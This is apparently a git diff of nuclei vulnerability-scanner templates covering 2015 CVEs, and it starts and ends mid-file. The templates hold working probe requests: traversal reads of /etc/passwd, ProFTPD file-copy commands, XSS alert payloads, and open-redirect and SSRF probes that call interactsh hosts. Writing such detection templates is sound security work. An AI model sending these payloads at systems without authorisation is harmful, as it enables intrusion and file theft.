matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-3224.yaml b/nuclei-templates/CVE-2015/CVE-2015-3224.yaml new file mode 100644 index 0000000000..157fd2451d --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-3224.yaml @@ -0,0 +1,38 @@ +id: CVE-2015-3224 +info: + name: Ruby on Rails Web Console - Remote Code Execution + author: pdteam + severity: critical + description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. + reference: + - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ + - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ + - https://hackerone.com/reports/44513 + - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 + classification: + cve-id: CVE-2015-3224 + tags: cve,cve2015,rce,rails,ruby +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + headers: + X-Forwarded-For: ::1 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Rails.root:" + - "Action Controller: Exception caught" + condition: and + - type: word + part: response + words: + - "X-Web-Console-Session-Id" + - "data-remote-path=" + - "data-session-id=" + case-insensitive: true + condition: or + +# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2015/CVE-2015-3306.yaml b/nuclei-templates/CVE-2015/CVE-2015-3306.yaml deleted file mode 100644 index 18a0e85813..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-3306.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2015-3306 - -info: - name: ProFTPd RCE - author: pdteam - severity: high - description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. - reference: - - https://github.com/t0kx/exploit-CVE-2015-3306 - - https://www.exploit-db.com/exploits/36803/ - - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html - - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html - classification: - cve-id: CVE-2015-3306 - tags: cve,cve2015,ftp,rce,network,proftpd - -network: - - inputs: - - data: "site cpfr /proc/self/cmdline\r\n" - read: 1024 - - data: "site cpto /tmp/.{{randstr}}\r\n" - read: 1024 - - data: "site cpfr /tmp/.{{randstr}}\r\n" - read: 1024 - - data: "site cpto /var/www/html/{{randstr}}\r\n" - - host: - - "{{Hostname}}" - - "{{Host}}:21" - - read-size: 1024 - matchers: - - type: word - part: raw - words: - - "Copy successful" diff --git a/nuclei-templates/CVE-2015/CVE-2015-3337.yaml b/nuclei-templates/CVE-2015/CVE-2015-3337.yaml deleted file mode 100644 index 9f755b9cac..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-3337.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2015-3337 - -info: - name: Elasticsearch Head plugin LFI - author: pdteam - severity: high - description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors. - reference: - - https://www.exploit-db.com/exploits/37054/ - - http://www.securityfocus.com/archive/1/535385 - - https://www.elastic.co/community/security - - http://www.debian.org/security/2015/dsa-3241 - classification: - cve-id: CVE-2015-3337 - tags: cve,cve2015,elastic,lfi,elasticsearch,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-3648.yaml b/nuclei-templates/CVE-2015/CVE-2015-3648.yaml deleted file mode 100644 index c1cac6dd15..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-3648.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2015-3648 - -info: - name: ResourceSpace - Local File inclusion - author: pikpikcu - severity: high - description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. - reference: - - https://vulners.com/cve/CVE-2015-3648/ - - https://www.securityfocus.com/bid/75019 - - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738 - - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html - classification: - cve-id: CVE-2015-3648 - tags: cve,cve2015,lfi,resourcespace - -requests: - - method: GET - path: - - "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-3897.yaml b/nuclei-templates/CVE-2015/CVE-2015-3897.yaml new file mode 100644 index 0000000000..71779328d7 --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-3897.yaml @@ -0,0 +1,39 @@ +id: CVE-2015-3897 + +info: + name: Bonita BPM 6.5.1 - Unauthenticated Directory Traversal + author: 0x_Akoko + severity: high + description: Directory traversal vulnerability in Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. + reference: + - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html + - https://www.bonitasoft.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-3897 + - https://www.htbridge.com/advisory/HTB23259 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-3897 + cwe-id: CWE-22 + tags: cve,cve2015,bonita,lfi,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd" + - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: regex + regex: + - "root:[x*]:0:0:" diff --git a/nuclei-templates/CVE-2015/cve-2015-4414.yaml b/nuclei-templates/CVE-2015/CVE-2015-4414.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-4414.yaml rename to nuclei-templates/CVE-2015/CVE-2015-4414.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-4668.yaml b/nuclei-templates/CVE-2015/CVE-2015-4668.yaml deleted file mode 100644 index f5efc56d36..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-4668.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2015-4668 - -info: - name: Xsuite 2.4.4.5 - Open Redirect - author: 0x_Akoko - severity: low - description: Open redirect vulnerability in Xsuite 2.4.4.5 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirurl parameter. - reference: - - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - - https://vuldb.com/?id.107082 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2015-4668 - cwe-id: CWE-601 - tags: cve,cve2015,redirect,xsuite - -requests: - - method: GET - path: - - '{{BaseURL}}/openwin.php?redirurl=http%3A%2F%2Fwww.example.com' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2015/CVE-2015-4694.yaml b/nuclei-templates/CVE-2015/CVE-2015-4694.yaml deleted file mode 100644 index 1a6ac1b0f5..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-4694.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2015-4694 - -info: - name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval - author: 0x_Akoko - severity: high - description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file. - reference: - - https://wordpress.org/plugins/zip-attachments/#developers - - https://wpscan.com/vulnerability/8047 - - https://nvd.nist.gov/vuln/detail/CVE-2015-4694 - - http://www.vapid.dhs.org/advisory.php?v=126 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cve-id: CVE-2015-4694 - cwe-id: CWE-22 - tags: lfi,wordpress,cve,cve2015,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd' - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2015/CVE-2015-5354.yaml b/nuclei-templates/CVE-2015/CVE-2015-5354.yaml new file mode 100644 index 0000000000..20062f876d --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-5354.yaml @@ -0,0 +1,26 @@ +id: CVE-2015-5354 +info: + name: Novius OS 5.0.1-elche - Open Redirect + author: 0x_Akoko + severity: medium + description: Open redirect vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. + reference: + - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html + - https://vuldb.com/?id.76181 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5354 + - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2015-5354 + cwe-id: CWE-601 + tags: cve,cve2015,redirect,novius +requests: + - method: GET + path: + - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh' + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2015/CVE-2015-5461.yaml b/nuclei-templates/CVE-2015/CVE-2015-5461.yaml new file mode 100644 index 0000000000..37fe790d57 --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-5461.yaml @@ -0,0 +1,26 @@ +id: CVE-2015-5461 + +info: + name: StageShow <= 5.0.8 - Open Redirect + author: 0x_Akoko + severity: medium + description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. + reference: + - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5461 + - https://wordpress.org/plugins/stageshow/changelog/ + - http://seclists.org/fulldisclosure/2015/Jul/27 + classification: + cve-id: CVE-2015-5461 + tags: redirect,cve,cve2015,wordpress,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/nuclei-templates/CVE-2015/CVE-2015-5531.yaml b/nuclei-templates/CVE-2015/CVE-2015-5531.yaml new file mode 100644 index 0000000000..f60c575c93 --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-5531.yaml @@ -0,0 +1,57 @@ +id: CVE-2015-5531 + +info: + name: ElasticSearch directory traversal vulnerability (CVE-2015-5531) + author: princechaddha + severity: high + description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. + reference: + - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 + - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html + - https://www.elastic.co/community/security/ + classification: + cve-id: CVE-2015-5531 + tags: cve,cve2015,elasticsearch + +requests: + - raw: + - | + PUT /_snapshot/test HTTP/1.1 + Host: {{Hostname}} + + { + "type": "fs", + "settings": { + "location": "/usr/share/elasticsearch/repo/test" + } + } + + - | + PUT /_snapshot/test2 HTTP/1.1 + Host: {{Hostname}} + + { + "type": "fs", + "settings": { + "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" + } + } + + - | + GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ElasticsearchParseException' + - 'Failed to derive xcontent from' + - '114, 111, 111, 116, 58' + condition: and + + - type: status + status: + - 400 diff --git a/nuclei-templates/CVE-2015/CVE-2015-6544.yaml b/nuclei-templates/CVE-2015/CVE-2015-6544.yaml new file mode 100644 index 0000000000..b0c4f26019 --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-6544.yaml @@ -0,0 +1,40 @@ +id: CVE-2015-6544 + +info: + name: iTop XSS + author: pikpikcu + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-6544 + - https://www.htbridge.com/advisory/HTB23268 + - http://sourceforge.net/p/itop/tickets/1114/ + - http://sourceforge.net/p/itop/code/3662/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2015-6544 + cwe-id: CWE-79 + tags: cve,cve2015,xss,itop + +requests: + - method: GET + path: + - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2015/CVE-2015-7450.yaml b/nuclei-templates/CVE-2015/CVE-2015-7450.yaml index 4f0418f4b2..9d3958a8e5 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-7450.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-7450.yaml @@ -1,21 +1,20 @@ id: CVE-2015-7450 info: - name: IBM WebSphere Java Object Deserialization - Remote Code Execution + name: IBM WebSphere Java Object Deserialization RCE author: wdahlenb severity: critical - description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). + description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) reference: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 + tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2015-7450 cwe-id: CWE-94 - tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java requests: - raw: @@ -52,8 +51,6 @@ requests: condition: and - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2015/CVE-2015-8813.yaml b/nuclei-templates/CVE-2015/CVE-2015-8813.yaml deleted file mode 100644 index 6b29a0b822..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-8813.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2015-8813 - -info: - name: Umbraco SSRF Vulnerability in Feedproxy.aspx - author: emadshanab - severity: high - description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server - reference: - - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 - - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce - - http://www.openwall.com/lists/oss-security/2016/02/18/8 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N - cvss-score: 8.2 - cve-id: CVE-2015-8813 - cwe-id: CWE-918 - tags: cve,cve2015,ssrf,oast,umbraco - -requests: - - method: GET - path: - - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}" - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2015/cve-2015-9414.yaml b/nuclei-templates/CVE-2015/CVE-2015-9414.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-9414.yaml rename to nuclei-templates/CVE-2015/CVE-2015-9414.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-9480.yaml b/nuclei-templates/CVE-2015/CVE-2015-9480.yaml new file mode 100644 index 0000000000..ac300031f7 --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-9480.yaml @@ -0,0 +1,33 @@ +id: CVE-2015-9480 + +info: + name: WordPress RobotCPA 5 - Directory Traversal + author: daffainfo + severity: high + description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. + reference: + - https://www.exploit-db.com/exploits/37252 + - https://nvd.nist.gov/vuln/detail/CVE-2015-9480 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-9480 + cwe-id: CWE-22 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/nuclei-templates/CVE-2015/cve-2015-0554.yaml b/nuclei-templates/CVE-2015/cve-2015-0554.yaml new file mode 100644 index 0000000000..a879737372 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-0554.yaml @@ -0,0 +1,30 @@ +id: CVE-2015-0554 + +info: + name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure + author: daffainfo + severity: high + description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. + reference: + - https://www.exploit-db.com/exploits/35721 + - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 + tags: cve,cve2015,pirelli,router,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/wlsecurity.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var wpapskkey" + - "var WscDevPin" + - "var sessionkey" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-1503.yaml b/nuclei-templates/CVE-2015/cve-2015-1503.yaml new file mode 100644 index 0000000000..273a65668b --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-1503.yaml @@ -0,0 +1,33 @@ +id: CVE-2015-1503 +info: + name: IceWarp Mail Server Directory Traversal + author: 0x_Akoko + severity: high + description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability. + reference: + - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html + - http://www.icewarp.com + - https://nvd.nist.gov/vuln/detail/CVE-2015-1503 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-1503 + cwe-id: CWE-200 + tags: cve,cve2015,icewarp,lfi,mail + +requests: + - method: GET + path: + - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd" + - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-2807.yaml b/nuclei-templates/CVE-2015/cve-2015-2807.yaml new file mode 100644 index 0000000000..b39565c245 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-2807.yaml @@ -0,0 +1,32 @@ +id: CVE-2015-2807 + +info: + name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 + tags: cve,cve2015,wordpress,wp-plugin,xss + description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-3224.yaml b/nuclei-templates/CVE-2015/cve-2015-3224.yaml deleted file mode 100644 index df6b263f83..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-3224.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2015-3224 - -info: - name: Ruby on Rails Web Console - Remote Code Execution - author: pdteam - severity: medium - description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. - impact: | - Remote code execution can lead to unauthorized access, data breaches, and complete compromise of the affected system. - remediation: | - Upgrade to a patched version of Ruby on Rails or disable the Web Console feature. - reference: - - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ - - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ - - https://hackerone.com/reports/44513 - - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 - - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160881.html - classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N - cvss-score: 4.3 - cve-id: CVE-2015-3224 - cwe-id: CWE-284 - epss-score: 0.92904 - epss-percentile: 0.98975 - cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: rubyonrails - product: web_console - tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails - -http: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - - headers: - X-Forwarded-For: ::1 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Rails.root:" - - "Action Controller: Exception caught" - condition: and - - - type: word - part: response - words: - - X-Web-Console-Session-Id - - data-remote-path= - - data-session-id= - case-insensitive: true - condition: or -# digest: 4a0a00473045022100c4b2125a78ee523a116fd826ab60375b59dd4e7783faf87bb57fdb018ec7183702203cd169073ca993580b1ad5b798b29f12ea43ea85d77a1f8eb1fce8095e0a0b34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-3306.yaml b/nuclei-templates/CVE-2015/cve-2015-3306.yaml new file mode 100644 index 0000000000..11942f4ccc --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-3306.yaml @@ -0,0 +1,30 @@ +id: CVE-2015-3306 + +info: + name: ProFTPd RCE + author: pdteam + severity: high + reference: https://github.com/t0kx/exploit-CVE-2015-3306 + description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. + tags: cve,cve2015,ftp,rce,network,proftpd + +network: + - inputs: + - data: "site cpfr /proc/self/cmdline\r\n" + read: 1024 + - data: "site cpto /tmp/.{{randstr}}\r\n" + read: 1024 + - data: "site cpfr /tmp/.{{randstr}}\r\n" + read: 1024 + - data: "site cpto /var/www/html/{{randstr}}\r\n" + + host: + - "{{Hostname}}" + - "{{Host}}:21" + + read-size: 1024 + matchers: + - type: word + part: raw + words: + - "Copy successful" diff --git a/nuclei-templates/CVE-2015/cve-2015-3337.yaml b/nuclei-templates/CVE-2015/cve-2015-3337.yaml new file mode 100644 index 0000000000..54768b240b --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-3337.yaml @@ -0,0 +1,25 @@ +id: CVE-2015-3337 + +info: + name: Elasticsearch Head plugin LFI + author: pdteam + severity: high + description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors. + reference: https://www.exploit-db.com/exploits/37054/ + tags: cve,cve2015,elastic,lfi,elasticsearch,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-3648.yaml b/nuclei-templates/CVE-2015/cve-2015-3648.yaml new file mode 100644 index 0000000000..9ea683095c --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-3648.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-3648 + +info: + name: ResourceSpace - Local File inclusion + author: pikpikcu + severity: high + description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. + reference: + - https://vulners.com/cve/CVE-2015-3648/ + - https://www.securityfocus.com/bid/75019 + tags: cve,cve2015,lfi,resourcespace + +requests: + - method: GET + path: + - "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-3897.yaml b/nuclei-templates/CVE-2015/cve-2015-3897.yaml deleted file mode 100644 index 68f3b923e4..0000000000 --- a/nuclei-templates/CVE-2015/cve-2015-3897.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2015-3897 - -info: - name: Bonita BPM Portal <6.5.3 - Local File Inclusion - author: 0x_Akoko - severity: medium - description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. - impact: | - An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. - remediation: | - Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability. - reference: - - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html - - https://www.bonitasoft.com/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-3897 - - https://www.htbridge.com/advisory/HTB23259 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N - cvss-score: 5 - cve-id: CVE-2015-3897 - cwe-id: CWE-22 - epss-score: 0.83225 - epss-percentile: 0.98353 - cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: bonitasoft - product: bonita_bpm_portal - tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft - -http: - - method: GET - path: - - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd" - - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini" - - stop-at-first-match: true - - matchers-condition: or - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - - - type: regex - regex: - - "root:[x*]:0:0:" -# digest: 